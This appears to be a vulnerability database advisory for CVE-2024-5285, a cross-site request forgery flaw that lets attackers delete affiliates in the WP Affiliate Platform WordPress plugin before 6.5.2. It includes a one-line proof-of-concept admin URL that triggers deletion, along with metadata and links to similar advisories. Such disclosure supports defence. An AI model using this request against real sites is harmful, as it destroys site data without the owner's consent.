WP Affiliate Platform < 6.5.2 – Affiliate Deletion via CSRF | CVE 2024-5285 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when deleting affiliates, which could allow attackers to make a logged in user change delete them via a CSRF attack

Proof of Concept

Have an admin access the following URL where `affiliate%5B%5D` is a valid affiliate username:

https://wps-test.ddev.site/wp-admin/admin.php?page=affiliates&action=delete&paged=1&affiliate%5B0%5D=das&action2=delete

Affects Plugins

wp-affiliate-platform

Fixed in 6.5.2

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

792f3904-88bd-47d1-9049-afccdd74853a

Timeline

Publicly Published

2024-07-08 (about 1 year ago)

Added

2024-07-08 (about 1 year ago)

Last Updated

2024-07-08 (about 1 year ago)

Other

Published

Title

Published

2025-09-05

Title

BCM Duplicate Menu <= 1.1.2 - Cross-Site Request Forgery

Published

2024-03-28

Title

HUSKY – Products Filter for WooCommerce (formerly WOOF) < 1.3.5.2 - Cross-Site Request Forgery

Published

2025-03-24

Title

Translator <= 0.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-05-29

Title

Comparison Slider <= 1.0.5 - Cross-Site Request Forgery

Published

2023-07-19

Title

Smarty for WordPress <= 3.1.35 - Settings Update via CSRF